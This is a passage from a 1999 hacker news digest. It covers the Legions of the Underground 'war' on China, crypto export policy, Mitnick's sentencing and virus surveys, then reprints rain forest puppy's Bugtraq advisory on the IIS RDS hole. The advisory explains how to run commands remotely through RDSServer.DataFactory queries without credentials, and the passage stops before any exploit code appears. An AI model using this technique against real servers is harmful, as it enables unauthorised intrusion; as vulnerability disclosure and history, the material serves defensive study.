Bronc Buster, a member of the Legions of the Underground,
attacks China's network firewalls.
HNN Archive for December 1, 1998
http://www.hackernews.com/archive.html?120198.html
Wired
http://www.wired.com/news/news/politics/story/16545.html?wnpg=1

December 4, 1998
China charges a software dealer with subversion after
supplying western dissidents with 30,000 email address.
Wired
http://www.wired.com/news/news/politics/story/16648.html


December 28, 1998
Two Chinese crackers are sentaced to death after cracking
a bank computer and wiring 720,000 yaun in non-existant
money to their own bank accounts.
CNN
http://www.cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/
Wired
http://www.wired.com/news/news/politics/story/17039.html

December 28, 1998
In an IRC press conferance Legions of the Underground
declares war on China and Iraq. They call for the complete
destruction of all computer systems in both countries. HNN
is first to report on the story the following morning
HNN Archive for December 29, 1998
http://www.hackernews.com/archive.html?122998.html

Edited transcript of IRC Press Conferance
http://www.hackernews.com/archive/louwar/louirc.html

Wired
http://www.wired.com/news/news/politics/story/17074.html

The Standard Online - Austria
http://derstandard.at/aktuell/article_web.asp?15471

National Post - Canada
http://www.nationalpost.com/home.asp?f=981231/2145043.html



January 5, 1999
Team spl0it joins the Legions of the Underground in their
War against China and Iraq.
HNN Archive for January 5, 1999
http://www.hackernews.com/archive.html?010599.html


January 6, 1999
Legions of the Underground releases a statement
contridicting their earlier statements that claims that they
never had destructive intentions and blame the media for
letting this get out of hand.
HNN Archive for January 6, 1999
http://www.hackernews.com/archive.html?010599.html

LoU Statement
http://www.hackernews.com/archive/louwar/lou1.html


January 7, 1999
An unprecedented joint statement and press release from
every major hacking group in the world is released
condeming the Legions of the Underground and their
Declaration of War.
HNN Archive for January 7, 1999
http://www.hackernews.com/archive.html?010799.html

Joint Statement
http://www.hackernews.com/archive/louwar/jointstat.html

Joint Press Release
http://www.hackernews.com/archive/louwar/jointpress.html


January 8, 1999
Incredible support is seen across the internet for the Joint
Statement released by the International Hacker Coalition.
The Legions of the Underground release a statement in
responce to the international coalition.
HNN Archive for January 8, 1999
http://www.hackernews.com/archive?html010999.html

Statement from Legions of the Underground
http://www.hackernews.com/archive/louwar/loustat.html


January 11, 1999
The Chinese web site promoting human-rights is cracked
again. It is unknown who cracked the site this time.
http://www.humanrights-china.org
Archive of cracked site
http://www.hackernews.com/archive/chinaHR/chinaHR.html



January 13, 1999
The Legions of the Underground tell Wired magazine that
the original press conferance was a fake and that the
people present during the press conferance were spoofed.
There is no evidence to support this but there is none to
deny it either.
Wired
http://www.wired.com/news/news/technology/story/17273.html

January 17, 1999
Several news orginisations from around the world pick up
the story.
MSNBC
http://www.msnbc.com/news/232090.asp

Spiegel Online - German
http://www.spiegel.de/netzwelt/jump.phtml?channel=netzwelt&rub=02&cont=themen/hackerkrieg.html

AP Wire - German
http://www.yahoo.de/schlagzeilen/19990112/vermischtes/916106760-0916103236-0000307154.html

Kitetoa - French
http://www.kitetoa.com/Pages/Textes/laguerredeLoU.htm


Februaury 9, 1999
The Legions of the Underground open a website offering
web hosting and security consulting services.
HNN Archive for February 9, 1999
http://www.hackernews.com/archive.html?020999.html

July 23, 1999
Optiklenz (Steve Stakton) issues a statement concerning
the hole 'war' and the current state of .gov and .mil web
page defacements.

Statement
http://www.hackernews.com/archive/louwar/legspeaks.html


@HWA


35.0 L0pht Releases Public Beta of AntiSniff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond
L0pht Heavy Industries today announced the public
beta release of its AntiSniff network security software,
which can detect attackers surreptitiously monitoring a
computer network. AntiSniff is a whole new breed of
network security tool, designed to detect remote
computers that are packet sniffing.

L0pht Heavy Industries
http://www.l0pht.com/antisniff

@HWA

36.0 Bill to Limit Crypto Exports Approved
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com


contributed by Ryan
The House Armed Services Committee has voted 47-6
to replace an industry-endorsed encryption bill with
substitute legislation drafted by law enforcement
advocates. The industry-endorsed bill would relax but
not remove export controls. The version approved by
the House Armed Services Committee would grant the
president complete authority to deny any expert
controls that he considers "contrary to the national
security interests of the United States."


Wired
http://www.wired.com/news/news/politics/story/20872.html

Industry Crypto Bill in Peril
by Declan McCullagh

5:00 p.m. 21.Jul.99.PDT
WASHINGTON -- And you thought
Congress was going to override White
House rules restricting US firms from
exporting encryption products. Well, you
were wrong.

The House Armed Services Committee
voted 47-6 Wednesday to replace an
industry-endorsed encryption bill with
substitute legislation drafted by law
enforcement advocates.

"Proliferation of encryption technology
would harm our ability to gather vital
intelligence, jeopardize our early threat
warning and attack assessment, risk our
ability to maintain an information-based
advantage over our enemies, and place
our nation's most secure systems at risk,"

said Representative Curt Weldon
(R-Pennsylvania), who introduced the
amendment.

The tech industry bill, sponsored by
Virginia Republican Bob Goodlatte, would
relax but not remove export controls on
everyday encryption products, such as
Web browsers and email programs. The
version approved by the House Armed
Services Committee would grant the
president complete authority to deny any
expert controls that he considers
"contrary to the national security
interests of the United States."


The House Rules Committee will decide
what version, if any, will be voted on by
the entire chamber. Experts expect that
if the industry-backed version wins,
opponents would try to add crippling
amendments during a floor vote.

Weldon's bill contains no domestic
restrictions on encryption, but the
measure is hardly what tech firms had
hoped for. It says any White House
export decision cannot be challenged in
court -- an attempt to block lawsuits like
one brought by a math professor that
won a recent victory in the Ninth Circuit
Court of Appeals.

Under Weldon's plan, the president will
set the "maximum level of encryption
strength"
that companies may export and
will convene a 12-member "Encryption
Industry and Information Security Board"

to advise on how widespread foreign
encryption products are.

"It's exactly the type of vote you'd
expect from the House Armed Services
Committee,"
said Jim Lucier, an analyst at
Prudential Securities. "This vote is not
particularly meaningful."


Industry groups had warned members of
the committee that proposals such as
Weldon's were unacceptable. "ITI
anticipates counting tomorrow's
committee mark-up as one of the key
votes for our 1999 'High-Tech Voting
Guide,' which will measure congressional
support for issues of importance to the
information technology industry,"
Rhett
Dawson, president of the Information
Technology Industry Council, said in a
letter Tuesday.

It didn't work. Not only did industry
groups lose but prominent Republicans,
such as J. C. Watts of Oklahoma, voted
for Weldon's amendment.

@HWA

37.0 Russian and Ukrainian Govs Monitor Internet Communications
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Lionel
The FSB (Russia's Federal Security Bureau, ex KGB) and
the SBU (the Security Service for the Ukraine) require
that some of their countries' internet providers give
them control over their network. The FSB asks providers
to monitor all the communications made by their clients,
the providers have to accept the control or have their
license canceled Ukrainian's providers have to accept
the SBU control in order to get a license. Furthermore,
they have to buy the hardware used in the monitoring.
This technology allows the security services to not only
access the logs but also to read private mail.

Yahoo News - French
http://www.yahoo.fr/actualite/19990722/multimedia/932640720-yaho150.220799.125237.html

@HWA


38.0 Here we go again, Mitnick to be Sentenced on Monday (Supposedly)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


From HNN http://www.hackernews.com

contributed by Space Rogue
After numerous delays Kevin Mitnick will finally be
senetenced for the federal charges that he has pleaded
guilty to. The biggest issue is how much restitution he
will have to pay if he is ever released. Remember that
after the Federal case is completed Kevin still needs to
answer charges from the State of California. The federal
hearing will be held on Monday July 26, at 1 pm in
Courtroom 12 at the LA Federal Courthouse, 312 N.
Spring Street.

FREE KEVIN
http://www.freekevin.com

@HWA

39.0 Virus Infestations on the Rise (?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by nvirB
An annual survey conducted by ICSA Inc. has found the
rate of virus infections is still rising despite the use of
Anti-Virus software.

ComputerWorld
http://www.computerworld.com/home/news.nsf/all/9907224icsa

ICSA
http://www.icsa.net/99survey/

Corporate virus infection rate on
the rise
By Kathleen Ohlson


As security experts keep pounding users and corporation to
use antivirus software, the rate of virus infections is still
rising -- despite most PCs and servers having antivirus
software installed, according to an annual survey conducted
by ICSA Inc.

In January and February of this year, the average rate of
infection per month per thousand PCs was approximately
twice the rate in 1998 and four times that of 1997, the
Reston, Va., security company said. ICSA is affiliated with
Gartner Group Inc.

Yet among the technology professionals surveyed at 300
U.S. companies and government organizations, 83% said at
least nine out of 10 of their PCs are protected by some form
of antivirus software, ICSA said.

It's not enough for companies and users to install antivirus
software on servers and desktops, said Larry Bridwell,
technical program manager for ICSA Labs, which
conducted the study. Along with updating the software
regularly, companies must implement security policies and
educate users, such as warning them not to open
documents if they don't know the sender. "It's too
dangerous,"
Bridwell said. "Viruses have become very
dynamic,"
spreading through downloads and attachments.

Other findings include the following:

Average recovery time for major infections (25
infected PCs or more at once) was 24 hours.

The median cost for those kinds of virus disasters,
including employee downtime, was $1,750. Some
respondents reported that costs totaled $100,000 in a
single virus event.

By spreading through automated e-mail, Melissa hit a
huge portion of users within the first few weeks.

Survey sponsors included Computer Associates
International Inc., Network Associates Inc., Panda Software
and Symantec Corp. Anyone interested in seeing the results
can register, free of charge, to view the survey on the ICSA
Web site.


ICSA/InfoSecurityMag Press release:

Study Confirms Increased Security Risks of
E-Commerce



Contacts:
Andy Briney
781-255-0200
abriney@infosecuritymag.com
Barbara Rose
ICSA
(717)-241-3233
brose@icsa.net


NORWOOD, MA (JULY 8)--A new study confirms that organizations conducting
Internet e-commerce experience far more information security breaches than those
that do not conduct e-commerce. According to a survey published today in
Information Security magazine (www.infosecuritymag.com), companies conducting
business online are 57 percent more likely to experience a proprietary information
leak and 24 percent more likely to experience a hacking-related breach. Overall, the
number of companies hit by an unauthorized access (hacking/cracking) breach
increased nearly 92 percent from 1997 to 1998, the study reports.

"The 1999 Information Security Industry Survey" appears in the July 1999 issue of
Information Security, published by ICSA Inc., the Reston-Va.-based Internet
security company. Co-sponsored by ICSA and Global Integrity Corp., the study also
reveals statistics on infosecurity software and hardware use, organizational budgets
for security, the use and effectiveness of infosecurity policies, and salary and
personnel issues affecting professionals engaged in securing their organization’s data,
communications and technology.

Overall, companies suffered an average loss of $256,000 to security breaches last
year, according to the study. Of the 745 organizations polled in the survey, 91
quantified their financial losses for a total of $23.3 million.

"Employee access abuses continue to be the most common security breach, but it’s
clear that the growth of e-business has intensified the threat of computer attacks
from outside the company’s walls,"
said Andrew Briney, editor-in-chief of
Information Security.

The number one security priority of survey respondents was protecting their
organizations against such attacks, according to the survey. More than one in five (21
percent) said "preventing hackers/crackers" was the single most pressing security
concern in their organization. "Preventing malicious code and viruses" was the
biggest concern for 17 percent of respondents, while another 15 percent said "e-mail
security."


For complete survey results, visit Information Security’s Web site at
www.infosecuritymag.com.

Based in Norwood, Mass., Information Security magazine is the leading trade
monthly for IT, networking and information security practitioners. ICSA, Inc.,
a Gartner Group affiliate, is the world's source of objective, independent,
Internet security assurance services. ICSA headquarters are located in Reston
Va,. For more information, contact ICSA at 703-453-0500.




@HWA

40.0 Do Handheld Electronics cause Problems with Avionics?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by kshaddri and others
Yesterday HNN reported that a man in England had been
sentenced to a year in jail for using his cell phone on a
an airplane. Not being aircraft designers we wondered
just how serious the risks really where. A lot of people
took the time to send us some information.

Computer-Related Incidents with Commercial Aircraft
http://www.rvs.uni-bielefeld.de/publications/Incidents/

Electromagnetic Interference with Aircraft Systems:
why worry?
http://www.rvs.uni-bielefeld.de/publications/Incidents/DOCS/Research/Rvs/Article/EMI.html


While it would seem that passenger electronics could in
theory cause problems on board an aircraft it is hard to
pin down actual instances of this happening. Clearly
more research is needed before people have to spend
time in jail.

@HWA

41.0 Alert: RDS IIS vulnerability/fix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 23 Jul 1999 12:21:20 -0500
Reply-To: ".rain.forest.puppy." <rfp@WIRETRIP.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: ".rain.forest.puppy." <rfp@WIRETRIP.NET>
Subject: Alert: RDS IIS vulnerability/fix
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM


#### ALERT! #### RDS/IIS 4.0 Vulnerability and Script #### ALERT! ####


By rain forest puppy / ADM / Wiretrip



"it...is direct, immediate, and almost 100% guaranteed
to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE
IS RIDICULOUS!"

-Russ Cooper, NTBugtraq



"This exploit also does *not* require the presence of
any sample web applications or example code...the
issue affects at least 50% of the IIS servers I have
seen"

-Greg Gonzalez, NTBugtraq



"Groovy, baby."
-Austin Powers, Spy who Shagged Me



- - - Table of Contents:


1. Names, PRs and the Media: State of Security Advisories
2. RDS Vulnerability Background
3. *MY* Guess at Greg's RDS Vulnerability
4. Bonus Aspects of My Script
5. More Bonus Features
6. How to Secure Your Server
7. Command Line Options
8. Random Q & A
9. Signoff
10. The code!!!!





- 1 - Names, PRs and the Media: State of Security Advisories


When I was at DefCon, I had an interview with a reporter who was doing
a story on 'hacker handles'. Of course, with a handle like Rain Forest
Puppy, I was a sure-win. After a 20 minute chat, the last question he
asked me was "What is your real name?" Of course, my response was "does
that matter?"
Well, to him it did. It seems like it matters to all the
big, formal media types and vendors. A perfect example of this would be
the whole RDS saga. Greg Gonzalez's original post gave me credit, since
he used some of what I talked about in my ODBC advisory posted to Bugtraq
earlier (thanks, Greg!). Russ Cooper did a recap, but failed to mention
me. Microsoft's advisory acknowledged Russ and Greg as well, sans me.


Now, I'm not an egomaniac that needs to see my name splashed over
everything. For that matter, those of you who know me personally know how
laid back I am concerning most issues. The point I'm trying to make is
whether or not a name is 'unsuitable' for mention in something as flashy
as a Russ or MS post (although side note, I must admit, Wired and ZDNet
have lightened up to this fact, especially lately with all the Dildog and
Orifice talk going on). If I remember correctly, David Litchfield got
some mentions for various vulnerability findings he had. But everyone
referenced him as David Litchfield, not 'Mnemonix', which is his hacker
handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :)
Even lately, for those of you Bugtraq fans out there (hey, how the hell
are you reading this, anyway!?!?!), you'll have noticed gone are the
loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's
defense, I can see justification of the shift. But the general fact that
there is a need/trend for a shift is concerning me.


The only taboo I can think of for the 'evil' of a hacker handle is the
issue of the obvious: anonymity. Apparently I must be running around
doing 'very bad things' (funny movie, BTW), and so I need to hide who I
really am, right?


Uh, no. (For lack of a snappy comeback)


I don't want to make this diatribe overly long, since I know you're
only here for the exploits anyway :) But seriously, why use a handle?
Well, there is a sense of tradition, for one. I shall not explain,
because I think it's apparent. The other is a sense of community. If
you're going to engage in a security discussion, why not do it with other
security professionals. And where can you just so happen to find a large
gaggle of people who know about security? Your local IRC server, sitting
in #hackphreak (watch out, JP logs), #hackteach, etc. These people have
nicknames themselves. So get yourself a nick and join in the
conversation!


But really, I use an alias. Does that make me evil? If I told you
my real name, would that shift your perspective of me into the light of
good? We'll get back to this, I want to transgress to another issue.


I use a handle. My only collateral at this point is my name, and my
name alone. If I find a big hole, post a research paper, etc, it adds
nothing but perhaps an "atta'boy" to the accomplishments of my nickname.
I've talked to people in real life and held discussions about that 'Rain
Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The
accomplishments belong to that name, and that name alone...unless I start
equating that name with other things. So, let's pretend I did. Let's say
I tossed my real name out there, and got that associated with my handle.
Now people in real life will equate the findings of Rain Forest Puppy to
me. I can add in my company name. Now my company can ride the 'success'
(if you will) of my findings as well, just because they're associated with
my name. (Come on, you know these situations exist. Transmeta is cool
just because the name 'Linus' is involved.) If I equate all kinds of
aspects together, I can then distribute the attention (a.k.a. advertising)
to them all as well. Think about it....if I found the next remote root
compromise in, say, sshd, I could slap not only my handle and name but
also my company name (Amazonian Trees, Inc) all over it! Wow, would that
not be great marketing for Amazonian Trees, Inc, especially if it ATI's
primary service was security related!


But hey, it's America. We live to make money, so it seems. So why not
do this? Right? Well, 'tis also the trend.


Look at all the press releases on security issues. The most recent one
was by Greg Gonzalez himself, for his company Information Technologies
Enterprises, Inc. The press release is at


http://www.infotechent.net/itenews.htm


Now, what I find interesting is that Greg has made a post to NTBugtraq
about the RDS vulnerability, yet will not release details of the
vulnerability until next week. Hmmm. Ok, so he can't release details,
but he can release press releases about it. Your point was made with the
post to NTBugtraq...the point of the press release is to ride the fame to
gain corporate exposure (which I'm equating as an excessive, corporate,
political machine type move which isn't all that wonderful). Not to pick
on Greg, because it's the trend. Look at WebTrends. They issued a press
release on 'their finding of security vulnerabilities in IIS sample
scripts' (never mind the fact that I had talked about such in a previous
Phrack article last December). The press release is at


http://www.webtrends.com/news/releases/release.asp?id=81


Wow, a vendor of a security scanner using the finding of vulnerabilities
as free marketing for their products. Well, do it where you can, right?


I will move off this subject, because L0pht has a nice long
composition on the matter in the Soapbox on their website, at


http://www.l0pht.com/~oblivion/soapbox/index.html


One interesting statement L0pht makes, going back to Greg Gonzalez and
Russ Cooper keeping the details of the RDS vulnerability to themselves for
a week:


"Now we have software vendors keeping things secret. At
least secret for a substantial period of time. Is this
the way we want the industry to behave?"



Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW.


---- Credits and Thank Yous ----------------------------------------------


I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com)
for helping me test my perl script and taking time to review my advisory.
I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz
of www.houseoffusion.com for their input and testing as well.


--------------------------------------------------------------------------


So back to the 'only a handle' thing. You have to understand that I
have a different perspective on it all. I publish everything under an
anonymous handle. What do I gain from this? Nothing personally. Nadda.
Zip. The handle itself may gain some fame, but not me personally. I do
not profit from this one way or another. What I do I do because I want
to, on my free time--and do it in a manner that is not greedy in any aspect.
I don't seek to gain, and in the current setup, I really can't gain a
whole hell of a lot. But I'm the bad guy, I forgot. It's much more
normal to leverage a security vulnerability as a marketing tool than it is
to just 'give' time and research away. Wow, I need to get with the Y2K I
guess.


Fine then. (Last tangent, then we'll get to the RDS issue, I promise :)
So, going back to you seeing me in the light of good.... Could you better
relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain
Forest Puppy' in conversation/publication? (Well, I mean this generically
for all hacker handles, but I'm specifically talking about mine here)
Would I be seen as more a security resource/less of a evil hacker if you
had a name to associate with my handle? Well, I guess I should make that
step. From now on, you can associate Mr. Russell F. Prigogine with the
nick Rain Forest Puppy (Hmmm...no, the initials are not mere
coincidence...clever, eh?). But since the big 'Russ' on campus is Russ
Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are
not a security concern worth talking about. Real slick, Russ), I would
prefer to have be used Mr. R.F. Prigogine (Mr. optional), if you can't--or
don't want to--use the nick Rain Forest Puppy.


So there. (As some would say) I sold out (oh, the horror of it). JP,
add that to your profile database. While I gather the broken pieces of my
dignity we'll move along to what you really want...





- 2 - RDS Vulnerability Background


Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities
in regards to the RDS problems originally detailed in MS98-004, which came
out around July 16, '98. He took that issue (which is basically the
simple fact that 'Remote Data Service' components allow *remote* access to
your *data*....who would have thought?) and combined it with the Jet
pipe/VBA delimiter 'feature' I discussed in my recent advisory. The
result?


1. You can make remote queries via RDS
2. You can embed NT command line commands in queries


Well, that's a pretty good combo. (side note, not to brag or anything, but
I mention the fact that RDS can be used to do that in my ODBC advisory,
under the title 'Msadc'). But, Greg threw in a twist which supposedly
is the kicker:


3. You don't need user IDs (and therefore no password required),
does *not* require the presence of any sample Web applications
or example code, or even an active database


I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE
SCRIPTS! Well, I guess that means Russ Cooper will let the post through
then... (if you don't get it, go back and re-read section one).


So Greg can do all that. And, to reiterate how dangerous this problem
really is...



"it...is direct, immediate, and almost 100% guaranteed
to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE
IS RIDICULOUS!"

-Russ Cooper, NTBugtraq



"This exploit also does *not* require the presence of
any sample web applications or example code...the
issue affects at least 50% of the IIS servers I have
seen"

-Greg Gonzalez, NTBugtraq




*** MEDIA FOLKS *** As it seems it's fun to attach dollar loss amounts
advisories, I will say the potential amount of
damage, due to the fact that at least 50% of all
IIS servers Greg has seen (hopefully he's seen a
lot) are vulnerable, using my sophisticated
reliable statistical computation method that is
authoritative, I'd place damage loss somewhere in
the 'close to Bill Gates salary(tm)' range.




Now, the sad part. As I mentioned before, both Greg and Russ (from this
point on, all instances of 'Russ' refer to Russ Cooper, and not the name
R. F. Prigogine) both know the details of this vulnerability. And yet
they are keeping them amongst themselves until next week. Does this even
disturb anyone? Greg says at least 50% of the IIS servers are
vulnerable...


DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVER ON THE INTERNET?


Ok, I have a scenario that's the same in principle, but will disturb
people even more:


---- Begin same scenario ------------------------------------------------


Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more
visually pleasing) has found a hole in the latest build of Apache web
server. There's a hole. I will announce there's a hole. I'll write up a
few PRs as well. But I will not tell you the exact nature of it. Don't
worry, Apache group will code a fix, and you'll be all set in a jiffy. In
the meantime, I'm not going to release the details of the exploit of the
hole. Instead I'm going to just keep it to myself....and my good buddies
Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews.


-------------------------------------------------------------------------


Hmmm....I bet *that* disturbed you. How about a better translation:


---- Begin translated same scenario -------------------------------------


I, RFP, have found a hole in Apache that I will not tell you about until
later, but in the meantime, me and my hacker buddies will know about it!
Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless.


-------------------------------------------------------------------------


What's the difference? Only the integrity of the people involved. Again,
a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain
Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg
Gonzalez isn't really a hacker that goes by 'Digital Killer'. I push for
the point that no matter who it is in any case, it's wrong.


Elias Levy would have told everyone the bug. :)


NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would
you pay?"
Administrivia from Feb 99, in which he says:


"Someone else makes the Security Portal and you get what they
think you need"



As oppose to getting what Russ thinks we need instead? It all depends on
whether or not the other guy denies posts about sample scripts....(if you
*still* don't get it, re-read section one AGAIN).


Ok, ok, so that RDS background turned more into a political thing.
Well, that's because it is. At this point, Russ and Greg are have the
keys to IIS servers. I don't know about you, but I'm not liking it. So
I'm getting off my ass and doing something. Besides the fact that this is
all published stuff at this point.


Also, I may be considered 'irresponsible' for posting the exploit.
Now, I would say *maybe* it would be debatable if I had posted *only* the
exploit. But I have posted not only a very long diatribe, but also my
guess of the vulnerability, which includes examples of analysis and
theory. I also detailed out how to secure your server, from this hole
in particular as well as other security problems in general. My hopes are
to educate people on what the problem is, and how I went about finding it
so that they can perhaps learn how to do it themselves. Education. It's
the key, and that's what I'm trying to do. No, no vendor
education...ADMIN education. USER education. I know I will probably be
futile as a whole in the end, but maybe a few people will learn something,
and that's all that matters to me.





- 3 - *MY* Guess at Greg's RDS Vulnerability


(I say 'guess' because I may not be right. But in any event, I
wouldn't be writing all this unless I found something moderately
interesting ;)


Ok, so Greg's RDS vulnerability has three main aspects:


1. You only need RDSServer.DataFactory component
2. It uses Jet queries with my embedded VBA via pipes trick
3. You don't need userIDs (and therefore no password required),
does *not* require the presence of any sample Web applications
or example code, or even an active database


Now, for those of you who don't know, RDS is basically a way to do
remote data queries to a server. This is done over the web. Basically
your client app communicates via HTTP to the /msadc/msadcs.dll on your
server. The msadcs.dll exposes the RDSServer.DataFactory object, or better
known as the AdvancedDataFactory.


Now AdvancedDataFactory only has four methods, so we're kind of limited
on what we can do. We can CreateRecordSet, Query, SubmitChanges, and
ConvertToString. Query and SubmitChanges require a valid database to work
upon. The other two are just data mangling functions. So there you have
it, that's what we have to work with.


I played with CreateRecordSet and ConvertToString. This actually
relays data from the client, to the server, and back. My hopes was that
somewhere in there I could slip one of my pipe-VBA-shells in there and do
fun stuff. But nope, all they did was regurgitate the data in a different
flavor. Oh well.


SubmitChanges just basically does an elaborate UPDATE/INSERT, where it
just syncs the server's database with the client's recordset. So that
leaves Query.


Well Query lets us run queries against an (existing) database. And we
know we can embed our pipe-VBA-shells in queries, so Query looks good.
But this is nothing spectacular. And there is one catch: the need for an
existing database. We need to pass a DSN to the ActiveDataFactory to
actually run the query on. The problem with the DSN is that:


1. DSNs can require UIDs and passwords
2. There's no way to get a list of available DSNs
(** through RDSServer.DataFactory functions, that
I'm aware of **)
3. I'd say a DSN constitutes an 'active' database


So DSNs blow away point 3 of our known things about Greg's RDS
vulnerability. What if we can get around using DSNs?


Well, we can. See, you can go the easy route by specifying "DSN=rfp",
and then the server keeps all the internal information about that DSN,
including driver, actually database file location (if it's a file-based
driver), UID, password, connection parameters, etc. Well, what's fun is
that we can directly give all that stuff in the query setup instead of a
DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F.
Prigogine). We will use these parameters:


DSN name 'rfp'
Microsoft Access (Jet) driver
c:\rfp.mdb for our database
UID will be 'rfp'
password will be 'prigogine'


So by invoking "DSN=rfp", the server knows to use the Access driver on the
c:\rfp.mdb file. DSNs are a nice tight way to precompose all that
information. Or we can do it on the fly. Rather than issuing a "DSN=rfp"
connect string, I can use instead:


"driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;"


This will still invoke the Access (Jet) driver, and tell it to directly
use c:\rfp.mdb. No UID. No password. No even worrying about if/what
DSNs exist. In the words of Cartman, "Sweet".


That whacks out part of known point #3 (no UID or password). We're
going to use the RDSServer.DataFactory control (known point #1), and we're
going to use the Access driver, with fun pipe-VBA-shell features (known
point #2). We're not using any other web sample scripts, so that cuts out
another portion of known point #3. Oh, we're so close...can you taste it?
(and what does it taste like? chicken?)


There's still one minor detail. Notice we have to specify the 'dbq='
parameter in the connection setup. And this needs to be a valid file. If
it's not, the SQL engine on the server side will fail and return errors
before it even gets around to looking at our queries. But damn, we need
an .mdb file to connect to. Well, if you look in the Access ODBC
reference on Microsoft's website (which sucks, half the links were broken at
various moments through the night while sifting through it...go MS. I
don't blame you though--you probably engineered your site/servers with
Microsoft products, and that explains it right there) you will see that
you can pass a CREATE_DB parameter to the Access driver. This will cause
the driver to construct a valid (empty) .mdb file. Woohoo! (not to
be confused with w00w00; the former is an expression of joy, the latter is
a cool group of guys that I had the fortune of hanging out with at DefCon)
So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with
everything else and low and behold, it...... <to be continued...>


----- Some words about my sponsors ---------------------------------------


-- www.technotronic.com Technotronic! Great place!


Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9
(before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!),
boasting a slick HTML design recently redone by yours truly (Rain Forest
Puppy/R. F. Prigogine), it's definitely a good site for the latest
security information--especially while PacketStorm is struggling to get
back on its feet (thanks, JP. Now die. What, you're sueing me now?!?)


While you're there, be sure to check out:


* Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a
windows box and see if it's a PDC, BDC, Member
server, SQL server, etc. Also look for the Unix
port of it by me sometime soon (after I finish
all this RDS stuff)
* Horizon's Page! -- that's right. Elite HTML coded by Humble himself.
Problem was he didn't know where to put the shell
code...<a href>? J/K :) The URL is /horizon/
* Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to
Germany, there was one last code fest, and some
fun binaries came out of it. Look for them soon!
Technotronic also has the R9 mirror at
rhino9.technotronic.com




-- www.l0pht.com L - zero - p - h - t


Everybody knows L0pht (even senators!) A very active 'independant
security (watchdog) group' who include Dr. Mudge & Dildog (BO2K creator).


While you're there, be sure to check out:


* L0phtcrack! -- one of the best NT password crackers out there! This
will prove highly useful if you use my script
do dump the SAM and grab the backup (not that
I encourage hacking...I've done this many times
in LEGIT contracted audits). It's a personal
tool I've standarized on.
* Advisories! -- L0pht releases a very nice variety of advisories, from
Windows DLL problems and Cold Fusion script
problems to Unix race conditions and symlink
vulnerabilities.
* NFR Modules! -- they've teamed up with NFR to be the supplier of many
interesting N-code/NFR modules. They have a nice
selection for your popular network attacks.


** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty
awesome as well!



-- www.houseoffusion.com A great independant Cold Fusion site!


The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man
for all things Cold Fusion and has helped me out immensely with various
Cold Fusion language issues (read: helped me work through some of the
various Cold Fusion exploits that have surfaced). He does offer training
for Cold Fusion...see 'Training Info' under '<Community>'. He co-authored
"Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web
Application Construction Kit"
vols 2 and 3, and was the founding member of
Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF
Advisor, at www.cfadvisor.com.


While you're there, be sure to check out:


* MunchkinLAN! -- a CF based web scanner, which is actually very minimal
code and runs out of an Access db.
* Mike's Mods! -- many modifications to the Cold Fusion Forums scripts,
which include speed/operation improvements.
* CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is
a high traffic list discussing Cold Fusion related
development issues, security, etc.



-- Thanks again to all of the above!


-------------------------------------------------------------------------


<continued from above> ...didn't work. Damn. The problem was that it
was passing the CREATE_DB parameter during the SQLDriverConnect() phase,
and that just isn't going to cut it. We need to issue a
SQLConfigDataSource() call (I think that was it...my mind is a mush of
ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do it's
thing, and RDSServer.DataFactory.Query just wasn't going to give us love.
So, after struggling with other nuances and ideas, I concluded that I
couldn't make a DSN, or a .mdb from scratch using Access SQL via
RDSServer.DataFactory without connecting to a database/.mdb beforehand.


(**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU
0DAY! :) rfp@wiretrip.net )


Well damn, so we need a database to make this work. Any 'ol database
will do (hell, even the WINS or DHCP .mdb should work >:). But
unfortunately, none come by default on a standard NT install. Bummer.
